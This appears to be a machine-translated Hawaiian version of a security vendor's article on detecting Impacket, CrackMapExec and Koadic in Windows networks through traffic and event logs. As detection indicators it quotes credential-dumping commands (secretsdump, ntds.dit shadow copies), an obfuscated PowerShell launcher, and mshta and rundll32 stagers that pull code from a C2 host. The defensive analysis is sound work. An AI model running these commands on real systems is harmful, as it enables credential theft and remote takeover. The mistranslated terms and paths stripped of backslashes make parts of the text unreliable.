ProHoster > Pūnaewele > Nā Administration > Pehea e ʻike ai i ka hoʻouka ʻana i ka ʻōnaehana Windows: ke aʻo ʻana i nā mea hana hacker

Pehea e ʻike ai i ka hoʻouka ʻana i ka ʻōnaehana Windows: ke aʻo ʻana i nā mea hana hacker

Pehea e ʻike ai i ka hoʻouka ʻana i ka ʻōnaehana Windows: ke aʻo ʻana i nā mea hana hacker

Ke ulu nei ka nui o nā hoʻouka kaua ma ka ʻoihana hui i kēlā me kēia makahiki: no ka laʻana i ka makahiki 2017, ua hoʻopaʻa ʻia he 13% o nā hanana kūʻokoʻa ma mua o 2016, a ma ka hopena o 2018 - 27% mau hanana hou akuma mua o ka wā ma mua. Me nā mea kahi o ka mea hana nui ka ʻōnaehana hana Windows. Ma 2017-2018, ka APT Dragonfly, APT28, APT MuddyWater ua hoʻouka kaua i nā hui aupuni a me nā pūʻali koa ma ʻEulopa, ʻAmelika ʻĀkau a me Saudi Arabia. A ua hoʻohana mākou i ʻekolu mau mea hana no kēia - Hoʻopaʻa, ʻO CrackMapExec и Koadic. Ua wehe ʻia kā lākou kumu kumu a loaʻa iā GitHub.

He mea pono e hoʻomaopopo ʻaʻole hoʻohana ʻia kēia mau mea hana no ke komo mua ʻana, akā no ka hoʻomohala ʻana i kahi hoʻouka kaua i loko o ka ʻoihana. Hoʻohana nā mea hoʻouka iā lākou ma nā pae like ʻole o ka hoʻouka ʻana ma hope o ke komo ʻana o ka perimeter. ʻO kēia, ma ke ala, paʻakikī ke ʻike a pinepine wale me ke kōkua o ka ʻenehana ka ʻike ʻana i nā ʻāpana o ka ʻae ʻana i ke kaʻa pūnaewele a i ʻole nā ​​mea hana e ʻae ai ʻike i nā hana ikaika a ka mea hoʻouka kaua ma hope o kona komo ʻana i ka ʻōnaehana. Hāʻawi nā mea hana i nā hana like ʻole, mai ka hoʻoili ʻana i nā faila i ka launa pū ʻana me ke kākau inoa a me ka hoʻokō ʻana i nā kauoha ma kahi mīkini mamao. Ua hana mākou i kahi noiʻi o kēia mau mea hana e hoʻoholo ai i kā lākou hana pūnaewele.

He aha kā mākou e hana ai:

  • E hoʻomaopopo i ka hana ʻana o nā mea hana hacking. E ʻike i nā mea e pono ai nā mea hoʻouka e hoʻohana a me nā ʻenehana hiki iā lākou ke hoʻohana.
  • E ʻimi i ka mea i ʻike ʻole ʻia e nā mea hana palekana ʻike i nā pae mua o ka hoʻouka ʻana. Hiki ke hoʻokuʻu ʻia ke kaʻina reconnaissance, no ka mea he mea hoʻouka kaua i loko, a i ʻole no ka hoʻohana ʻana o ka mea hoʻouka i kahi lua o ka ʻoihana i ʻike ʻole ʻia ma mua. Hiki ke hoʻihoʻi i ke kaulahao holoʻokoʻa o kāna mau hana, no laila ka makemake e ʻike i ka neʻe hou aku.
  • Hoʻopau i nā mea maikaʻi ʻole mai nā mea hana intrusion detection. ʻAʻole pono mākou e poina i ka wā e ʻike ʻia ai kekahi mau hana ma ke kumu o ka reconnaissance wale nō, hiki i nā hewa pinepine. ʻO ka maʻamau i loko o ka ʻōnaehana he nui nā ala, ʻaʻole hiki ke ʻike ʻia mai nā mea kūpono i ka nānā mua ʻana, e kiʻi i kekahi ʻike.

He aha ka mea e hāʻawi ai kēia mau mea hana i nā mea hoʻouka? Inā ʻo Impacket kēia, a laila loaʻa nā mea hoʻouka i kahi waihona nui o nā modula i hiki ke hoʻohana ʻia ma nā ʻano like ʻole o ka hoʻouka ʻana ma hope o ka haki ʻana i ka perimeter. Nui nā mea hana e hoʻohana i nā modula Impacket i loko - no ka laʻana, Metasploit. Loaʻa iā ia ka dcomexec a me ka wmiexec no ka hoʻokō kauoha mamao, secretsdump no ka loaʻa ʻana o nā moʻolelo mai ka hoʻomanaʻo ʻana i hoʻohui ʻia mai Impacket. ʻO ka hopena, ʻo ka ʻike pololei ʻana i ka hana o ia waihona e hōʻoia i ka ʻike ʻana i nā derivatives.

ʻAʻole ia he coincidence i kākau nā mea hana iā "Powered by Impacket" e pili ana iā CrackMapExec (a i ʻole CME wale nō). Eia kekahi, ua mākaukau ʻo CME no nā hiʻohiʻona kaulana: Mimikatz no ka loaʻa ʻana o nā huaʻōlelo a i ʻole kā lākou hashes, hoʻokō i ka Meterpreter a i ʻole Empire agent no ka hoʻokō mamao, a me Bloodhound ma luna o ka moku.

ʻO ke kolu o nā mea hana a mākou i koho ai ʻo Koadic. He mea hou loa ia, ua hōʻike ʻia ma ka hālāwai hacker honua DEFCON 25 ma 2017 a ua ʻike ʻia e kahi ala maʻamau: hana ia ma HTTP, Java Script a me Microsoft Visual Basic Script (VBS). Ua kapa ʻia kēia ala e noho ana ma waho o ka ʻāina: hoʻohana ka mea hana i kahi pūʻulu hilinaʻi a me nā hale waihona puke i kūkulu ʻia i loko o Windows. Kapa nā mea hana iā COM Command & Control, a i ʻole C3.

IMPACKET

He ākea loa ka hana a Impacket, mai ka ʻike ʻana i loko o AD a me ka hōʻiliʻili ʻana i ka ʻikepili mai nā kikowaena MS SQL kūloko, a i nā ʻenehana no ka loaʻa ʻana o nā hōʻoia: he SMB relay attack kēia, a loaʻa i ka faila ntds.dit i loaʻa nā hashes o nā huaʻōlelo hoʻohana mai kahi mea hoʻokele domain. Hoʻokō pū ʻo Impacket i nā kauoha me ka hoʻohana ʻana i ʻehā mau ʻano ʻano like ʻole: WMI, Windows Scheduler Management Service, DCOM, a me SMB, a koi i nā hōʻoia e hana pēlā.

huna huna

E nānā kākou iā secretsdump. He module kēia e hiki ke hoʻopaʻa i nā mīkini mea hoʻohana a me nā mea hoʻokele domain. Hiki ke hoʻohana ʻia no ka loaʻa ʻana o nā kope o nā wahi hoʻomanaʻo LSA, SAM, SECURITY, NTDS.dit, no laila hiki ke ʻike ʻia ma nā pae like ʻole o ka hoʻouka ʻana. ʻO ka hana mua i ka hana o ka module ʻo ia ka hōʻoia ʻana ma o SMB, e koi ana i ka ʻōlelo huna a ka mea hoʻohana a i ʻole kāna hash e hoʻokō maʻalahi i ka hoʻouka ʻana i ka Pass the Hash. A laila hele mai kahi noi e wehe i ke komo ʻana i ka Service Control Manager (SCM) a loaʻa ke komo i ke kākau inoa ma o ka protocol winreg, me ka hoʻohana ʻana i ka mea hoʻouka e ʻike i ka ʻikepili o nā lālā hoihoi a loaʻa nā hopena ma o SMB.

Ma Fig. 1 ʻike mākou i ke ʻano o ka hoʻohana ʻana i ka protocol winreg, loaʻa ke komo me ka hoʻohana ʻana i kahi kī hoʻopaʻa inoa me kahi LSA. No ka hana ʻana i kēia, e hoʻohana i ke kauoha DCERPC me ka opcode 15 - OpenKey.

Pehea e ʻike ai i ka hoʻouka ʻana i ka ʻōnaehana Windows: ke aʻo ʻana i nā mea hana hacker
Laiki. 1. Wehe i kahi kī hoʻopaʻa inoa me ka hoʻohana ʻana i ka protocol winreg

A laila, i ka loaʻa ʻana o ke kī, mālama ʻia nā waiwai me ke kauoha SaveKey me ka opcode 20. Hana ʻo Impacket i kēia ma kahi ala kikoʻī. Mālama ʻo ia i nā waiwai i kahi faila nona ka inoa he kaula o 8 mau huaʻōlelo i hoʻopili ʻia me .tmp. Eia hou, hoʻouka hou ʻia kēia faila ma o SMB mai ka papa kuhikuhi System32 (Fig. 2).

Pehea e ʻike ai i ka hoʻouka ʻana i ka ʻōnaehana Windows: ke aʻo ʻana i nā mea hana hacker
Laiki. 2. Hoʻolālā no ka loaʻa ʻana o kahi kī hoʻopaʻa inoa mai kahi mīkini mamao

Hiki ke ʻike ʻia kēlā hana ma ka pūnaewele e nā nīnau i kekahi mau lālā hoʻopaʻa inoa e hoʻohana ana i ka protocol winreg, nā inoa kikoʻī, nā kauoha a me kā lākou kauoha.

Ke waiho nei kēia module i nā meheu i ka log event Windows, e maʻalahi ke ʻike. No ka laʻana, ma muli o ka hoʻokō ʻana i ke kauoha

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Ma ka Windows Server 2016 log e ʻike mākou i ke kaʻina o nā hanana:

1. 4624 - Logon mamao.
2. 5145 - nānā i nā kuleana komo i ka lawelawe mamao winreg.
3. 5145 - ke nānā ʻana i nā kuleana komo faila ma ka papa kuhikuhi System32. Loaʻa i ka faila ka inoa i ʻōlelo ʻia ma luna.
4. 4688 - hana i kahi kaʻina hana cmd.exe e hoʻomaka ai vssadmin:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - hana i kahi kaʻina me ke kauoha:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - hana i kahi kaʻina me ke kauoha:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - hana i kahi kaʻina me ke kauoha:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

E like me nā mea hana ma hope o ka hoʻohana ʻana, loaʻa iā Impacket nā modula no ka hoʻokō mamao ʻana i nā kauoha. E kālele ana mākou i ka smbexec, ka mea e hāʻawi ai i kahi pūpū kauoha interactive ma kahi mīkini mamao. Pono pū kēia module i ka hōʻoia ma o SMB, me ka ʻōlelo huna a i ʻole ka ʻōlelo huna. Ma Fig. Ma ka Figure 3 ʻike mākou i kahi laʻana o ka hana ʻana o ia mea hana, ma kēia hihia ʻo ia ka console luna hoʻomalu kūloko.

Pehea e ʻike ai i ka hoʻouka ʻana i ka ʻōnaehana Windows: ke aʻo ʻana i nā mea hana hacker
Laiki. 3. Pāʻani smbexec console

ʻO ka hana mua o smbexec ma hope o ka hōʻoia ʻana e wehe i ka SCM me ke kauoha OpenSCManagerW (15). ʻIke ʻia ka nīnau: ʻo DUMMY ka kahua MachineName.

Pehea e ʻike ai i ka hoʻouka ʻana i ka ʻōnaehana Windows: ke aʻo ʻana i nā mea hana hacker
Laiki. 4. Noi e wehe i ka Mana Mana Mana

A laila, hana ʻia ka lawelawe me ke kauoha CreateServiceW (12). I ka hihia o smbexec, hiki iā mākou ke ʻike i ke ʻano o ke kauoha kūkulu ʻana i kēlā me kēia manawa. Ma Fig. Hōʻike ka ʻōmaʻomaʻo 5 i nā ʻāpana kauoha hiki ʻole ke hoʻololi ʻia, hōʻike ka melemele i ka mea hiki ke hoʻololi i ka mea hoʻouka. He mea maʻalahi ke ʻike hiki ke hoʻololi ʻia ka inoa o ka faila hoʻokō, kāna papa kuhikuhi a me ka faila hoʻopuka, akā ʻoi aku ka paʻakikī o ke koena e hoʻololi me ka hoʻopilikia ʻole i ka loiloi o ka module Impacket.

Pehea e ʻike ai i ka hoʻouka ʻana i ka ʻōnaehana Windows: ke aʻo ʻana i nā mea hana hacker
Laiki. 5. Noi e hana i lawelawe me ka hoohana ana i ka Mana Mana Mana

Haʻalele pū ʻo Smbexec i nā ʻāpana ʻike i ka log hanana Windows. I loko o ka Windows Server 2016 log no ka shell command interactive me ke kauoha ipconfig, e ʻike mākou i ke ʻano nui o nā hanana.

1. 4697 — hoʻokomo i ka lawelawe ma ka mīkini o ka mea i pepehi ʻia:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - ka hana ʻana i ke kaʻina hana cmd.exe me nā hoʻopaʻapaʻa mai ka helu 1.
3. 5145 - nānā i nā kuleana komo i ka faila __output ma ka papa kuhikuhi C$.
4. 4697 - hoʻokomo i ka lawelawe ma ka mīkini o ka mea i pepehi ʻia.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ka hana ʻana i ke kaʻina hana cmd.exe me nā hoʻopaʻapaʻa mai ka helu 4.
6. 5145 - nānā i nā kuleana komo i ka faila __output ma ka papa kuhikuhi C$.

ʻO Impacket ke kumu no ka hoʻomohala ʻana i nā mea hoʻouka kaua. Kākoʻo ia i nā protocol āpau i ka ʻōnaehana Windows a i ka manawa like he mau hiʻohiʻona ponoʻī. Eia nā noi winreg kikoʻī, a me ka hoʻohana ʻana i ka SCM API me ka hoʻokumu ʻana i ke kauoha, a me ke ʻano inoa faila, a me SMB kaʻana SYSTEM32.

CRACKMAPEXEC

Hoʻolālā mua ʻia ka mea hana CME e hoʻomaʻamaʻa i kēlā mau hana maʻamau a ka mea hoʻouka e hana ai e holomua i loko o ka pūnaewele. Hāʻawi ia iā ʻoe e hana pū me ka ʻelele Empire kaulana a me Meterpreter. No ka hoʻokō ʻana i nā kauoha malū, hiki iā CME ke hoʻokaʻawale iā lākou. Ke hoʻohana nei ʻo Bloodhound (kahi mea hana hoʻokaʻawale ʻē aʻe), hiki i kahi mea hoʻouka ke hoʻokaʻawale i ka ʻimi no kahi kau luna hoʻomalu.

'īlio

ʻO Bloodhound, ma ke ʻano he mea hana kūʻokoʻa, e ʻae i ka reconnaissance kiʻekiʻe i loko o ka pūnaewele. ʻOhi ia i ka ʻikepili e pili ana i nā mea hoʻohana, nā mīkini, nā hui, nā kau a hāʻawi ʻia ma ke ʻano he palapala PowerShell a i ʻole faila binary. Hoʻohana ʻia nā protocols LDAP a i ʻole SMB e hōʻiliʻili i ka ʻike. Hāʻawi ka CME integration module i ka Bloodhound e hoʻoiho i ka mīkini o ka mea i pepehi ʻia, holo a loaʻa i ka ʻikepili i hōʻiliʻili ʻia ma hope o ka hoʻokō ʻana, a laila e hoʻomaʻamaʻa i nā hana i loko o ka ʻōnaehana a hōʻemi ʻole iā lākou. Hāʻawi ka Bloodhound graphical shell i ka ʻikepili i hōʻiliʻili ʻia ma ke ʻano o nā kiʻi, e ʻae iā ʻoe e ʻimi i ke ala pōkole loa mai ka mīkini o ka mea hoʻouka i ka luna hoʻomalu.

Pehea e ʻike ai i ka hoʻouka ʻana i ka ʻōnaehana Windows: ke aʻo ʻana i nā mea hana hacker
Laiki. 6. ʻAiʻaʻa Bloodhound

No ka holo ʻana ma ka mīkini o ka mea i pepehi ʻia, hana ka module i kahi hana me ka hoʻohana ʻana i ka ATSVC a me SMB. ʻO ATSVC kahi kikowaena no ka hana ʻana me ka Windows Task Scheduler. Hoʻohana ʻo CME i kāna hana NetrJobAdd(1) e hana i nā hana ma luna o ka pūnaewele. Hōʻike ʻia kahi hiʻohiʻona o ka mea a ka module CME e hoʻouna ai ma Fig. 7: ʻO kēia ke kauoha kauoha cmd.exe a me ka code obfuscated ma ke ʻano o nā hoʻopaʻapaʻa ma ka format XML.

Pehea e ʻike ai i ka hoʻouka ʻana i ka ʻōnaehana Windows: ke aʻo ʻana i nā mea hana hacker
Fig.7. Ke hana nei i kahi hana ma o CME

Ma hope o ka waiho ʻia ʻana o ka hana no ka hoʻokō ʻana, hoʻomaka ka mīkini o ka mea i pepehi ʻia ʻo Bloodhound ponoʻī, a hiki ke ʻike ʻia kēia ma ke kaʻa. Hōʻike ʻia ka module e nā nīnau LDAP no ka loaʻa ʻana o nā pūʻulu maʻamau, kahi papa inoa o nā mīkini a me nā mea hoʻohana a pau i ka domain, a loaʻa ka ʻike e pili ana i nā kau mea hoʻohana ikaika ma o ka noi SRVSVC NetSessEnum.

Pehea e ʻike ai i ka hoʻouka ʻana i ka ʻōnaehana Windows: ke aʻo ʻana i nā mea hana hacker
Laiki. 8. Loaʻa i ka papa inoa o nā kau hana ma o SMB

Eia kekahi, ʻo ka hoʻokuʻu ʻana i ka Bloodhound ma ka mīkini o ka mea i pepehi ʻia me ka hoʻopaʻa ʻana i hiki ke hele pū ʻia me kahi hanana me ID 4688 (ka hana hana) a me ka inoa kaʻina. «C:WindowsSystem32cmd.exe». ʻO ka mea kaulana e pili ana iā ia, ʻo ia nā ʻōlelo hoʻopaʻapaʻa laina kauoha:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

He mea hoihoi loa ka module enum_avproducts mai ka manaʻo o ka hana a me ka hoʻokō. ʻAe ʻo WMI iā ʻoe e hoʻohana i ka ʻōlelo nīnau WQL e kiʻi i ka ʻikepili mai nā mea Windows like ʻole, ʻo ia ka mea e hoʻohana ai kēia module CME. Hoʻopuka ia i nā nīnau i nā papa AntiSpywareProduct a me AntiМirusProduct e pili ana i nā mea hana pale i kau ʻia ma ka mīkini o ka mea i pepehi ʻia. No ka loaʻa ʻana o ka ʻikepili kūpono, hoʻopili ka module i ka inoa inoa rootSecurityCenter2, a laila hana i kahi nīnau WQL a loaʻa kahi pane. Ma Fig. Hōʻike ka helu 9 i nā mea o ia mau noi a me nā pane. I kā mākou laʻana, ua loaʻa ʻo Windows Defender.

Pehea e ʻike ai i ka hoʻouka ʻana i ka ʻōnaehana Windows: ke aʻo ʻana i nā mea hana hacker
Laiki. 9. Hana pūnaewele o ka module enum_avproducts

ʻO ka manawa pinepine, hiki ke hoʻopau ʻia ka loiloi WMI (Trace WMI-Activity), nona nā hanana e loaʻa ai ka ʻike pono e pili ana i nā nīnau WQL. Akā inā hiki ke hoʻohana ʻia, a laila inā e holo ka ʻatikala enum_avproducts, e mālama ʻia kahi hanana me ka ID 11. Aia ka inoa o ka mea hoʻohana i hoʻouna i ka noi a me ka inoa ma ka inoa inoa rootSecurityCenter2.

Ua loaʻa i kēlā me kēia modula CME kāna mau kiʻi ponoʻī, ʻo ia nā nīnau WQL kikoʻī a i ʻole ka hana ʻana i kekahi ʻano hana i loko o kahi papa hana me ka obfuscation a me ka hana kikoʻī Bloodhound ma LDAP a me SMB.

KOADIC

ʻO kahi hiʻohiʻona ʻokoʻa o Koadic ka hoʻohana ʻana i nā unuhi unuhi JavaScript a me VBScript i kūkulu ʻia i loko o Windows. Ma kēia ʻano, hahai ia i ka noho ʻana o ka ʻāina - ʻo ia hoʻi, ʻaʻohe ona hilinaʻi waho a hoʻohana i nā mea hana maʻamau Windows. He mea paahana keia no ke Kauoha a me ka Mana (CnC), no ka mea, ma hope o ka ma'i, ua ho'okomo 'ia ka "implant" ma ka mīkini, e 'ae ai e ho'omalu 'ia. Ua kapa ʻia kēlā mīkini, ma nā huaʻōlelo Koadic, he "zombie." Inā ʻaʻole lawa nā pono no ka hana piha ʻana ma ka ʻaoʻao o ka mea i pepehi ʻia, hiki iā Koadic ke hoʻāla iā lākou me ka hoʻohana ʻana i nā ʻenehana User Account Control bypass (UAC bypass).

Pehea e ʻike ai i ka hoʻouka ʻana i ka ʻōnaehana Windows: ke aʻo ʻana i nā mea hana hacker
Laiki. 10. Koadic Shell

Pono ka mea i pepehi ʻia e hoʻomaka i ke kamaʻilio me ke kikowaena Command & Control. No ka hana ʻana i kēia, pono ʻo ia e hoʻopili i kahi URI i hoʻomākaukau mua ʻia a loaʻa i ke kino Koadic nui me ka hoʻohana ʻana i kekahi o nā stagers. Ma Fig. Hōʻike ka 11 i kahi laʻana no ka mshta stager.

Pehea e ʻike ai i ka hoʻouka ʻana i ka ʻōnaehana Windows: ke aʻo ʻana i nā mea hana hacker
Laiki. 11. Hoʻomaka i kahi hālāwai me ke kikowaena CnC

Ma muli o ka pane pane WS, ua maopopo ka hoʻokō ʻana ma o WScript.Shell, a ʻo nā mea hoʻololi STGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE loaʻa nā ʻike nui e pili ana i nā ʻāpana o ke kau o kēia manawa. ʻO kēia ka lua noi-pane mua ma kahi pilina HTTP me kahi kikowaena CnC. ʻO nā noi hope e pili pono ana i ka hana o nā modules i kapa ʻia (implants). Hoʻohana wale ʻia nā modula Koadic a pau me kahi hui ikaika me CnC.

Mimikatz

E like me ka CME e hana pū me Bloodhound, hana pū ʻo Koadic me Mimikatz ma ke ʻano he papahana ʻokoʻa a he nui nā ala e hoʻomaka ai. Aia ma lalo iho kahi pālua noi-pane no ka hoʻoiho ʻana i ka implant Mimikatz.

Pehea e ʻike ai i ka hoʻouka ʻana i ka ʻōnaehana Windows: ke aʻo ʻana i nā mea hana hacker
Laiki. 12. Hoʻolilo iā Mimikatz iā Koadic

Hiki iā ʻoe ke ʻike i ke ʻano o ka hoʻololi ʻana o ka format URI i ka noi. Loaʻa i kēia manawa kahi waiwai no ka hoʻololi csrf, nona ke kuleana no ka module i koho ʻia. Mai malama i kona inoa; Ua ʻike mākou a pau he ʻokoʻa ka hoʻomaopopo ʻana o CSRF. ʻO ka pane ʻo ia ke kino nui o Koadic, kahi i hoʻohui ʻia ai ke code e pili ana iā Mimikatz. Nui loa ia, no laila e nānā kākou i nā mea nui. Eia mākou i ka waihona Mimikatz i hoʻopaʻa ʻia ma base64, kahi papa .NET serialized e hoʻokomo iā ia, a me nā hoʻopaʻapaʻa e hoʻomaka ai iā Mimikatz. Hoʻouna ʻia ka hopena hoʻokō ma luna o ka pūnaewele ma kahi kikokikona maopopo.

Pehea e ʻike ai i ka hoʻouka ʻana i ka ʻōnaehana Windows: ke aʻo ʻana i nā mea hana hacker
Laiki. 13. Ka hopena o ka holo ʻana iā Mimikatz ma kahi mīkini mamao

Exec_cmd

Loaʻa iā Koadic nā modula e hiki ke hoʻokō i nā kauoha mamao. Ma ʻaneʻi e ʻike mākou i ke ʻano o ka hanauna URI a me nā ʻano maʻamau sid a me csrf. Ma ka hihia o ka exec_cmd module, hoʻohui ʻia ke code i ke kino i hiki ke hoʻokō i nā kauoha shell. Ma lalo iho nei ua hōʻike ʻia kēlā code i loko o ka pane HTTP o ka kikowaena CnC.

Pehea e ʻike ai i ka hoʻouka ʻana i ka ʻōnaehana Windows: ke aʻo ʻana i nā mea hana hacker
Laiki. 14. Hoʻokomo i ke code exec_cmd

Pono ka hoʻololi GAWTUUGCFI me ka ʻano WS maʻamau no ka hoʻokō code. Me kona kōkua, kāhea ka implant i ka pūpū, e hana ana i nā lālā ʻelua o ke code - shell.exec me ka hoʻihoʻi ʻana o ke kahawai ʻikepili puka a me shell.run me ka hoʻi ʻole.

ʻAʻole ʻo Koadic kahi mea hana maʻamau, akā aia kāna mau kiʻi ponoʻī e hiki ai ke loaʻa iā ia ma ke kaʻa kūpono:

  • hoʻokumu kūikawā o nā noi HTTP,
  • me ka hoʻohana ʻana i ka API winHttpRequests,
  • ka hana ʻana i kahi mea WScript.Shell ma o ActiveXObject,
  • kino hoʻokō nui.

Hoʻomaka ka pilina mua e ka stager, no laila hiki ke ʻike i kāna hana ma o nā hanana Windows. No mshta, ʻo kēia ka hanana 4688, e hōʻike ana i ka hana ʻana i kahi kaʻina me ka ʻano hoʻomaka:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

ʻOiai e holo ana ʻo Koadic, hiki iā ʻoe ke ʻike i nā hanana 4688 ʻē aʻe me nā hiʻohiʻona e ʻike pono iā ia:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

haʻina

Ke ulu nui nei ka noho ʻana ma waho o ka ʻāina i waena o nā lawehala. Hoʻohana lākou i nā mea hana a me nā mīkini i kūkulu ʻia i loko o Windows no kā lākou pono. Ke ʻike nei mākou i nā mea hana kaulana ʻo Koadic, CrackMapExec a me Impacket ma muli o kēia kumu i ʻike nui ʻia ma nā hōʻike APT. Ke ulu nei ka nui o nā ʻōpala ma GitHub no kēia mau mea hana, a ke ʻike ʻia nei nā mea hou (ʻoi aku ma kahi o hoʻokahi tausani o lākou i kēia manawa). Ke ulu nei ke ʻano ma muli o kona maʻalahi: ʻaʻole pono nā mea hoʻouka kaua i nā mea hana ʻekolu; aia lākou ma nā mīkini o nā mea i hōʻeha ʻia a kōkua iā lākou e kāpae i nā hana palekana. Ke nānā nei mākou i ke aʻo ʻana i ke kamaʻilio pūnaewele: ʻo kēlā me kēia mea hana i hōʻike ʻia ma luna aʻe e waiho i kona mau meheu ponoʻī i ka hele ʻana o ka pūnaewele; ʻO ka noiʻi kikoʻī iā lākou i ʻae iā mākou e aʻo i kā mākou huahana ʻIke ʻia ʻo PT Network Attack Discovery ʻike iā lākou, ʻo ia ka mea e kōkua i ka noiʻi ʻana i ke kaulahao holoʻokoʻa o nā hanana cyber e pili ana iā lākou.

Authors:

  • ʻO Anton Tyurin, ke poʻo o ka 'Oihana Hoʻonaʻauao, PT Expert Security Center, Positive Technologies
  • Egor Podmokov, loea, PT Expert Security Center, Positive Technologies

Source: www.habr.com

Pākuʻi i ka manaʻo hoʻopuka